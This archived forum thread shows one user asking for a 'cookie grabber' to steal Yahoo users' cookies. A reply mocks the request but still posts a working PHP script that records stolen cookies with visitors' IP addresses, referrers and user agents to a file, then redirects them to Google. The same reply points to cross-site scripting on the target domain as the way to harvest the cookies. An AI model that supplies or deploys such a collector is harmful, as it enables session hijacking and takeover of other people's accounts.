PDA

View Full Version : cookie grabber?



-ICEBOX-
09-18-2006, 04:21 PM
anyone has a cookie grabber... or can someone pm me how to get cookie in yahoo.. hope its ok ask and share somthing... thanx in advanced...

Ezekiel
09-19-2006, 12:13 PM
anyone has a cookie grabber... o

'Cookie grabbers' are simply php/perl scripts which take in data and write it to file or email it. They become 'cookie grabbers' when you set this data as the user's cookie. There is nothing special about them.

To get a cookie grabber, go learn php. Even if you were given one you would not know how to use it unless you had knowledge of the languages (php/perl, html, and javascript). It's not some magic script which does everything for you.


<?php
$text = "\r\n\r\n-> Date: " . date('r') . "\r\n-> User's IP Address: " . $_SERVER["REMOTE_ADDR"] . "\r\n-> Referrer: " . $_SERVER['HTTP_REFERER'] . "\r\n-> User Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n-> Cookie:\r\n\r\n" . $_GET["ck"] . " \r\n\r\n============================================================================================ ===========================";
$filehandle = fopen("cookies.txt", "a");
fwrite($filehandle, $text);
fclose($filehandle);
header("Location: http://www.google.com");
?>

See how pointless me posting that script was?


r can someone pm me how to get cookie in yahoo.. hope its ok ask and share somthing... thanx in advanced...

To get cookies from yahoo users you examine all the web pages on the ********** domain until you find a cross site scripting vulnerability. You need to know the languages mentioned above, and nobody will do this for you.